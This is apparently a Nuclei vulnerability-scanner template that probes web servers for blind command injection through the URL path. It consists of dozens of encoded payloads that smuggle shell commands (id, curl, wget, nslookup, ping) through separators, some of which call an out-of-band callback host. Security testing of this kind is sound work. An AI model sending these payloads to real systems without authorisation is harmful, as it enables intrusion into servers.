id: rce-blind-uri

info:
  name: RCE Blind URI
  description: RCE Blind via URI
  author: reewardius
  severity: critical
  tags: rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/%24%28id%29"
      - "{{BaseURL}}/%26%26%2520%60id%60"
      - "{{BaseURL}}/%27;id;%27"
      - "{{BaseURL}}/%3B%24%28id%29"
      - "{{BaseURL}}/%3B%60id%60"
      - "{{BaseURL}}/%60id%60"
      - "{{BaseURL}}/%7C%24%28id%29"
      - "{{BaseURL}}/%7C%60id%60"
      - "{{BaseURL}}/%7C%7C%2520%60id%60"
      - "{{BaseURL}}/&%24%28ping%24%7BIFS%7D-c1%24%7BIFS%7D%7B%7Binteractsh-url%7D%7D%29%26ping%7BIFS%7D-c1%7BIFS%7D%7B%7Binteractsh-url%7D%7D%26%27%5C%22%600%26%24%28ping%24%7BIFS%7D-c1%24%7BIFS%7D%7B%7Binteractsh-url%7D%7D%29%26ping%7BIFS%7D-c1%7BIFS%7D%7B%7Binteractsh-url%7D%7D%26%60%27"
      - "{{BaseURL}}/{{url_encode(\u000aid\u0020)}}"
      - "{{BaseURL}}/{{url_encode($(id))}}"
      - "{{BaseURL}}/{{url_encode(&& $(id)}}`"
      - "{{BaseURL}}/{{url_encode(&& `curl {{interactsh-url}}`}}`"
      - "{{BaseURL}}/{{url_encode(&& `id`}}`"
      - "{{BaseURL}}/{{url_encode(&& `nslookup {{interactsh-url}}`}}`"
      - "{{BaseURL}}/{{url_encode(&& `wget {{interactsh-url}}`}}`"
      - "{{BaseURL}}/{{url_encode(; `curl {{interactsh-url}}`}}`"
      - "{{BaseURL}}/{{url_encode(; `nslookup {{interactsh-url}}`}}`"
      - "{{BaseURL}}/{{url_encode(; `wget {{interactsh-url}}`}}`"
      - "{{BaseURL}}/{{url_encode(;$(id)}}`"
      - "{{BaseURL}}/{{url_encode(;`curl${IFS}{{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(;`id`)}}"
      - "{{BaseURL}}/{{url_encode(;`nslookup${IFS}{{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(;`wget${IFS}{{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(`curl {{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(`id`)}}"
      - "{{BaseURL}}/{{url_encode(`nslookup {{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(`wget {{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(|$(id))}}"
      - "{{BaseURL}}/{{url_encode(|`id`)}}"
      - "{{BaseURL}}/{{url_encode(|id)}}"
      - "{{BaseURL}}/{{url_encode(|| $(id))}}"
      - "{{BaseURL}}/{{url_encode(|| `curl {{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(|| `id`)}}"
      - "{{BaseURL}}/{{url_encode(|| `nslookup {{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(|| `wget {{interactsh-url}}`)}}"
      - "{{BaseURL}}{{url_encode($(id))}}"
      - "{{BaseURL}}{{url_encode(&&$(id))}}"
      - "{{BaseURL}}{{url_encode(&&`id`)}}"
      - "{{BaseURL}}{{url_encode(&&id)}}"
      - "{{BaseURL}}{{url_encode(;`id`)}}"
      - "{{BaseURL}}{{url_encode(;id)}}"
      - "{{BaseURL}}{{url_encode(`id`)}}"
      - "{{BaseURL}}{{url_encode(||$(id))}}"
      - "{{BaseURL}}{{url_encode(||`id`)}}"
      - "{{BaseURL}}{{url_encode(||id)}}"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
        condition: and
        
      - type: word
        part: interactsh_protocol 
        words:
          - "http"
          - "dns"
